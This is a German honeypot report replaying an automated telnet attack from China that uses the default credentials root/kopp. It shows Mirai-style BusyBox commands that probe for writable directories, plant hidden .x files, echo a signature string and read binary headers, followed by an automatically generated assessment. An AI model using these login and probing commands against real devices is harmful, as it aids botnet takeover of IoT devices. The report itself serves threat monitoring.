ALLSmartSecurity
Mitschnitt

Telnet-Angriff aus Volksrepublik China: BusyBox-Ausbruch und Ausbruch in eine Shell

30.09.2026, 12:17 UTC · 15 Befehle · über telnet · Volksrepublik China · 2× wiederholt

Überblick

Dienst
telnet (Port 23)
Herkunft
Volksrepublik China · CHINA UNICOM China169 Backbone
Probierte Zugangsdaten
root / kopp
Gleiche Sitzung gesehen
2×

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~

root@srv01:~$ start
bash: start: command not found
root@srv01:~$ enable
bash: enable: command not found
root@srv01:~$ config terminal
bash: config: command not found
root@srv01:~$ system
bash: system: command not found
root@srv01:~$ linuxshell
bash: linuxshell: command not found
root@srv01:~$ su
su: must be run from a terminal
root@srv01:~$ shell
bash: shell: command not found
root@srv01:~$ sh
root@srv01:~$ >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x46\x53\x4d\x4d\x49\x48'
bash: /var/run/.x: No such file or directory
FSMMIH
root@srv01:~$ /bin/busybox wget;/bin/busybox echo -ne '\x46\x53\x4d\x4d\x49\x48'
FSMMIH
root@srv01:~$ /bin/busybox cat /bin/ls|head -n 1
/bin/busybox: can't execute: No such file or directory
root@srv01:~$ /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
/bin/busybox: hexdump: not found
root@srv01:~$ /bin/busybox cat /bin/ls|more
/bin/busybox: 'more' is not an applet
root@srv01:~$ dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
/bin/busybox: dd: not found
root@srv01:~$ /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
/bin/busybox: can't open '/bin/busybox': No such file or directory

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer verband sich über Telnet mit dem Honeypot und versuchte, sich mit den Standardzugangsdaten root und kopp anzumelden. Nach der Anmeldung gab er eine Reihe von Befehlen ein, die typisch für die Konfiguration von Netzwerkgeräten wie Routern oder Switches sind. Anschließend versuchte er, in eine Linux-Shell zu wechseln und verschiedene Systemverzeichnisse zu manipulieren, um eine Hintertür zu installieren.

Was die Befehle bewirken

Die ersten Befehle wie enable und config terminal sind Cisco-CLI-Befehle, was auf eine falsche Annahme über das Zielsystem hindeutet. Der Wechsel in die Linux-Shell und das Ausführen von su zeigen den Versuch, höhere Rechte zu erlangen. Die komplexen Zeilen mit cd und >/var/run/.x versuchen, versteckte Dateien in verschiedenen Verzeichnissen anzulegen, was oft zur Tarnung von Malware dient. Die Busybox-Befehle wie wget, cat und dd dienen dazu, Dateien herunterzuladen, Inhalte zu lesen oder binäre Daten zu extrahieren, wobei hexdump und head genutzt werden, um Dateiköpfe zu analysieren. Die wiederholte Ausgabe von FSMMIH deutet auf einen Test oder eine spezifische Signatur hin, die der Angreifer erwartet hat.

Worauf es hinauslief

Das Ziel war vermutlich die Übernahme eines eingebetteten Geräts, um es als Teil eines Botnetzes zu rekrutieren oder als Brückenkopf für weitere Angriffe zu nutzen. Die Verwendung von Busybox-Befehlen und das Anlegen versteckter Dateien deuten auf eine Persistenzstrategie hin, die typisch für Malware auf IoT-Geräten ist. Da die Befehle auf einem echten Linux-System fehlgeschlagen wären, deutet dies auf einen automatisierten Scan gegen spezifische Firmware-Varianten hin.

Einordnung

Dies ist ein sehr verbreiteter, automatisierter Angriff, der oft von Botnetzen wie Mirai oder ähnlichen Varianten stammt. Die Kombination aus Telnet-Zugriff und generischen IoT-Befehlen ist charakteristisch für massenhafte Scans, die keine individuelle Anpassung an das Zielgerät vornehmen.